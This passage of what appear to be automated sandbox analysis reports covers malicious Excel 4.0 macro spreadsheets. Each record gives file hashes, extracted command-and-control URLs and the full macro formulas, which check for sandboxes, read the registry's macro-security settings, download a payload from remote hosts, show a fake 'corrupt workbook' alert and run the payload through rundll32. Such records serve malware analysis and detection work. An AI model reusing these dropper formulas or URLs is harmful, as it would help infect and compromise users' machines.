,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5OuzR79KJV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f4d481da71b06ba883ba59bfeae18b42166f0dd50b8a594d7d6f97e799fb1a1"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3f4d481da71b06ba883ba59bfeae18b42166f0dd50b8a594d7d6f97e799fb1a1","filesize":167936,"md5":"6eda8562a31eccb402893b8190d9360d","sha1":"0fbdd6a40f7951e2fe526b0128ecb49fab88fcb3","sha256":"3f4d481da71b06ba883ba59bfeae18b42166f0dd50b8a594d7d6f97e799fb1a1","sha512":"9fb11d2ffb0f3cab39c468c894d8264763bb4a5482e1f3cd4037b8028b551fcf54ed3a95b431b3986d8666cb87419421eabae63420e725a8d9d8297d3fa663b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f4d481da71b06ba883ba59bfeae18b42166f0dd50b8a594d7d6f97e799fb1a1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AFWnrjJSMW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f6566c5d8736332d19995f97f30645ec39ad4fcf02d0734d7c7ed1d0ac3c229"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3f6566c5d8736332d19995f97f30645ec39ad4fcf02d0734d7c7ed1d0ac3c229","filesize":171008,"md5":"0bf242a3e07c3147e76743ac2d0aad1e","sha1":"1ebd986d14be156dbe8d38c66540b70ac9d8810a","sha256":"3f6566c5d8736332d19995f97f30645ec39ad4fcf02d0734d7c7ed1d0ac3c229","sha512":"d6bdfb67127457d6ea693b59ac454f17dc0303eeb8444ee82d44d01436827f2a8ab7f3a2ed5a9e90777b97f97d06829c4a7337ddd209a5c6c6ca7ca4c152be0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f6566c5d8736332d19995f97f30645ec39ad4fcf02d0734d7c7ed1d0ac3c229.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"f9zRGFqk0s\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f7693ac34020692928cd5d4581d735cf19f89b92d9e956659cf9458db55fe2e"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3f7693ac34020692928cd5d4581d735cf19f89b92d9e956659cf9458db55fe2e","filesize":177152,"md5":"00ff9c0d2dedb403a477be12e36ce1ed","sha1":"9529e6f628882cfc0d25f8acd6a4458d45058d5a","sha256":"3f7693ac34020692928cd5d4581d735cf19f89b92d9e956659cf9458db55fe2e","sha512":"c48ff2a106de6f6e44ef1ebf45065a71a46ae4751626990ca755f6c19e85f580a2869b6e3ac6f1c87c6cadfafcc370bcb8320826abdde1e5ae2fee169d6e3231","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f7693ac34020692928cd5d4581d735cf19f89b92d9e956659cf9458db55fe2e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mMjhjxiAcX\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3f8d9a2ee9169dcf8d16f29f226f0275eac9eadbb3cba3b33682b19ff61f76c0"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3f8d9a2ee9169dcf8d16f29f226f0275eac9eadbb3cba3b33682b19ff61f76c0","filesize":185344,"md5":"0cf2c67b3ee98e5bc7fce8d4d498de5b","sha1":"97d9b9e0ad7f3ef885fecdf6a74fded839e9871e","sha256":"3f8d9a2ee9169dcf8d16f29f226f0275eac9eadbb3cba3b33682b19ff61f76c0","sha512":"fe9d7cf3d3fbfd22995dfbe7c6b29b601534f33036d9817afa83d68ce1496efcbb8df9c2c32f2ae7ecd31c46177343486d76a49d4811bf513a2899b5874352cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3f8d9a2ee9169dcf8d16f29f226f0275eac9eadbb3cba3b33682b19ff61f76c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fa229db325985a6e472f88dcfa1154e308bda2494251c94ba8579c47a35dd9f"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fa229db325985a6e472f88dcfa1154e308bda2494251c94ba8579c47a35dd9f","filesize":167424,"md5":"32282b50aa598c9cbb6a7c058acaa871","sha1":"42332894ec51254d5acabfa6f0e163b2a26a3541","sha256":"3fa229db325985a6e472f88dcfa1154e308bda2494251c94ba8579c47a35dd9f","sha512":"5339ce8c45756611da835c2803be44c7eb135c8db4875f3bd2ab56f2dcf13b61bee202418336316f4cea92d830f90f3deb42bc2f20b6a1032b25e3a20dce5e19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fa229db325985a6e472f88dcfa1154e308bda2494251c94ba8579c47a35dd9f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"W8wm8tnCAG\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fba4f47a21922900949b88434cd932a1e71aa2d4950d0dffa486c7d77f3464f"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fba4f47a21922900949b88434cd932a1e71aa2d4950d0dffa486c7d77f3464f","filesize":206336,"md5":"5a70cdd15814e70b1a0a42788b224913","sha1":"daf5ee30b977b9f9b69100ed8c942f1e986cbcd9","sha256":"3fba4f47a21922900949b88434cd932a1e71aa2d4950d0dffa486c7d77f3464f","sha512":"0e0c94302a6a4122a0f234fe1f21903230339d7a8bb14803c680839d88b9ef849977e31f2485f3ef627174d484062be53fd0cc0bb969647d2215b5c00c8782b3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fba4f47a21922900949b88434cd932a1e71aa2d4950d0dffa486c7d77f3464f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZxzlUZOJ9X\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fcc227b72481717872a10059a48973b8f3f886a719c8b558c2f39b2dddc451b"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fcc227b72481717872a10059a48973b8f3f886a719c8b558c2f39b2dddc451b","filesize":167936,"md5":"e45937c61d506949d8e264e088fa8cc7","sha1":"d409c5b5e4549e2534d6ecbf9236689693e6a8c9","sha256":"3fcc227b72481717872a10059a48973b8f3f886a719c8b558c2f39b2dddc451b","sha512":"19bd1219feb31a0b49aa92b27b551420cfcafba04734984c3869404e855d6e936f09f932c7acbd4b20d4e06a14d2660ed59c412830d912ff530bd4e445c29669","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fcc227b72481717872a10059a48973b8f3f886a719c8b558c2f39b2dddc451b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5qCQ6j4ZFc\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fcd6604a1d7f8198a9c9292bbdbd2ce283d6191bd4d93f3e8fae0eaf58e6fc0"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fcd6604a1d7f8198a9c9292bbdbd2ce283d6191bd4d93f3e8fae0eaf58e6fc0","filesize":225280,"md5":"905a18de3599b48227050743ec6527d5","sha1":"1efcbd9e85f1f57660ce96744bbe038364c27f37","sha256":"3fcd6604a1d7f8198a9c9292bbdbd2ce283d6191bd4d93f3e8fae0eaf58e6fc0","sha512":"b6c5f9387c1222a27d293c52653ea146fd212678e224833a41a4c978d6bc8225a498883e5f845ee1d58d41cc49d93e695a2f608499dca67cbc171b8fc9c922a0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fcd6604a1d7f8198a9c9292bbdbd2ce283d6191bd4d93f3e8fae0eaf58e6fc0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yWrSsKgzLU\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fce6eef1f0302ec9b4949d4ce2643046f28825027ec43385a82ec9c49ff8a6a"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fce6eef1f0302ec9b4949d4ce2643046f28825027ec43385a82ec9c49ff8a6a","filesize":109568,"md5":"8d4698988c7c4901e57e8b65ef79d680","sha1":"e340287877e6963f83fc281ec020e59cb84558d8","sha256":"3fce6eef1f0302ec9b4949d4ce2643046f28825027ec43385a82ec9c49ff8a6a","sha512":"e729bfe21605187e1afcd133b806f456cadeb592aa7d64c5f0d8338af32822ec5b16b053b2bddee3b242998c3713d7de63de7d4c27a5a494332dfec1d0926844","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fce6eef1f0302ec9b4949d4ce2643046f28825027ec43385a82ec9c49ff8a6a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"Sq6W9EDsg3\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fce9c9c4524db3a4954f8829c4cf68369e3d452e776d79dc9876fa4f640ecd5"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fce9c9c4524db3a4954f8829c4cf68369e3d452e776d79dc9876fa4f640ecd5","filesize":167424,"md5":"b5229dbd24a9378a8eeee0dd18b8915f","sha1":"52beb79468a67a59fc1dd67852987cf87e609161","sha256":"3fce9c9c4524db3a4954f8829c4cf68369e3d452e776d79dc9876fa4f640ecd5","sha512":"64006ca022de55c9acc36120ec455645020212e2e38d6c3a3b326faf9c485f2ff9b4001512de6b001ed6d2d1894a086ed7d23d8613dd25e1c07ccdfd59d7b57f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fce9c9c4524db3a4954f8829c4cf68369e3d452e776d79dc9876fa4f640ecd5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"lEUspV7y4D\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fd826a4786204a95032e139744ba02c14f228c83d65840910ebe369ba8ef4ec"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fd826a4786204a95032e139744ba02c14f228c83d65840910ebe369ba8ef4ec","filesize":171008,"md5":"19d9508d439d12e8e6670baadf09da79","sha1":"133f1ee5be16d13ce2400fd530c3d9ee4a6d1e3a","sha256":"3fd826a4786204a95032e139744ba02c14f228c83d65840910ebe369ba8ef4ec","sha512":"d32e1dc099b046633b0ab381ffd02e6fe0ea5f83ac5f4a19973ddce9159af34c8a67f4cea90bdd92e02fe84c9626c0d22ecacaf63e5768dd0b1512613fb230a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fd826a4786204a95032e139744ba02c14f228c83d65840910ebe369ba8ef4ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g94TJZyo74\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fdcf72310f3d681178095159817acf99665a5d7493ba5154ee2ed36fc51e6b2"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fdcf72310f3d681178095159817acf99665a5d7493ba5154ee2ed36fc51e6b2","filesize":168960,"md5":"65b76374105c0c952711a305f6f78471","sha1":"1e95f7bd4667acd0c790a893b4dfb1725733325a","sha256":"3fdcf72310f3d681178095159817acf99665a5d7493ba5154ee2ed36fc51e6b2","sha512":"345a0e8feee2105e71c9fa40bfffdb70ab2cf3816d424df6fa377c95a935f2d890f96e93aa48df792ecd87003882f19872734931c1f7c9c69cd5f99e0d13622e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fdcf72310f3d681178095159817acf99665a5d7493ba5154ee2ed36fc51e6b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5Tgc8kfSXH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fde0fabf7633e0316ff5abefba5c5a642603c620dd3b4f671a02cf8e3dcb8c3"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fde0fabf7633e0316ff5abefba5c5a642603c620dd3b4f671a02cf8e3dcb8c3","filesize":167936,"md5":"5342d962793a5c99db17b283374924f2","sha1":"ae763c3903217bc0a739dc72a4f3ed9c49eacbfa","sha256":"3fde0fabf7633e0316ff5abefba5c5a642603c620dd3b4f671a02cf8e3dcb8c3","sha512":"6a7e0de1439a3a9792baf960073d2d0e78b326c4b92982ffca6c0335e32d955144c217c0a83bb5c07f77a2b2399f9d3aeb0043a0584c58697ad134af3d1e9fac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fde0fabf7633e0316ff5abefba5c5a642603c620dd3b4f671a02cf8e3dcb8c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"upImV8SGLI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fe5a5459fe5ecf0e766812ce57b5a2f0395f84e714833431d986ec73a8e9eef"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fe5a5459fe5ecf0e766812ce57b5a2f0395f84e714833431d986ec73a8e9eef","filesize":219136,"md5":"d758130b3456c00732364b47afa66bcc","sha1":"dcc1b2fca8c04e42937b1e555a3717cccdbf9435","sha256":"3fe5a5459fe5ecf0e766812ce57b5a2f0395f84e714833431d986ec73a8e9eef","sha512":"7a9f3376e7802bc95fff705ab3bf8a61781bac736fa242a86188ac808eac5970d30a9b835f125396a9fec9a4caf7ba22fe57bd76f6ca12a81a8988e9c614b833","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fe5a5459fe5ecf0e766812ce57b5a2f0395f84e714833431d986ec73a8e9eef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HzLruxQ4j3\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3fefc2028435011b0b06739c2b2f0b67f4c419d2d2f4f1acf1a6134aa6905311"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3fefc2028435011b0b06739c2b2f0b67f4c419d2d2f4f1acf1a6134aa6905311","filesize":206336,"md5":"dce652488c215651cf5132817e044e17","sha1":"9fb71225ccba1dad439807f1667f0e246d249980","sha256":"3fefc2028435011b0b06739c2b2f0b67f4c419d2d2f4f1acf1a6134aa6905311","sha512":"3062138ddad99bdfc8a248dd6231d2fbc7086ada54438407b51f5ed7204a75ea1902ba2d4a4f66dff5ad0f24f7d23233135d65852d7319045f792041d3298045","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3fefc2028435011b0b06739c2b2f0b67f4c419d2d2f4f1acf1a6134aa6905311.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT 